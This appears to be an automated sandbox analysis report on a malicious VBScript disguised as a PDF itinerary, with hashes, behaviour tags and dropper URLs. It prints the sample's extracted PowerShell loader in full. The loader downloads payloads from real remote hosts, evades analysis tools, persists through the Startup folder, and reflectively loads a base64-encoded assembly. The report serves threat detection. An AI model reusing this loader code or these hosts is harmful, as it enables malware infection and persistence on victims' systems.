c32c454ae2dba633e5f9e7222bb06a49c2841886689b7b4961013ec3dc9e722e

General

Target

itinerarydetails.pdf.vbs
Size

97KB
Sample

241211-t9ehtswjak
MD5

a64af1eb173a81ce83d8688582925a20
SHA1

0c4fbcfe1313d577199dacd5593824344e61ab1a
SHA256

c32c454ae2dba633e5f9e7222bb06a49c2841886689b7b4961013ec3dc9e722e
SHA512

82f7195508c8cb1abd524f94783bf352d46918090ab8c51a50a73d83e176573f8175769a4fe90fbac2c0bb83d516f8058bca89e9a8acda810f66adc92de2da16
SSDEEP

768:MjjjjjjjDWuF78+OUCp+aejjjjjjjjjjjjjjjjj3:tuFvYQX

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

1
; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$crymz = 'https://drive.google.com/uc?export=download&id=';$TcedQ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $TcedQ ) {$crymz = ($crymz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$crymz = ($crymz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$qpzdg = (New-Object Net.WebClient);$qpzdg.Encoding = [System.Text.Encoding]::UTF8;$qpzdg.DownloadFile($crymz, ($HzOMj + '\Upwin.msu') );$TzvFQ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\itinerarydetails.pdf.vbs' -Destination ( $TzvFQ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ 
2
       
3
}
4
5
else{ 
6
Restart-Computer -force ;
7
      exit;
8
 };$pdtzp = ('https://desckvbrat.com.br/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$cRmec = $webClient.DownloadString( $pdtzp ) ;$cRmec | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$ufKME  = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $ufKME ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$frFmc =  '$sNwoM = ''C:\Users\Admin\AppData\Local\Temp\itinerarydetails.pdf.vbs'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$frFmc += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$frFmc += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$frFmc += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$frFmc += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/Z5ARx/r/ee.etsap//:sptth'' , $sNwoM ,  ''DD1DRegAsm''  ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$frFmc | Out-File -FilePath $VBWWz  -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};

URLs

ps1.dropper

https://desckvbrat.com.br/Upcrypter/01/DLL01.txt

exe.dropper

https://drive.google.com/uc?export=download&id=

exe.dropper

https://desckvbrat.com.br/Upcrypter/01/DLL01.txt

Targets

- Target
  
  itinerarydetails.pdf.vbs
- Size
  
  97KB
- MD5
  
  a64af1eb173a81ce83d8688582925a20
- SHA1
  
  0c4fbcfe1313d577199dacd5593824344e61ab1a
- SHA256
  
  c32c454ae2dba633e5f9e7222bb06a49c2841886689b7b4961013ec3dc9e722e
- SHA512
  
  82f7195508c8cb1abd524f94783bf352d46918090ab8c51a50a73d83e176573f8175769a4fe90fbac2c0bb83d516f8058bca89e9a8acda810f66adc92de2da16
- SSDEEP
  
  768:MjjjjjjjDWuF78+OUCp+aejjjjjjjjjjjjjjjjj3:tuFvYQX
Score

10^/10

execution
- Blocklisted process makes network request
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Drops startup file
- Command and Scripting Interpreter: PowerShell
  Using powershell.exe command.
  execution
- Legitimate hosting services abused for malware hosting/C2
behavioral1 behavioral2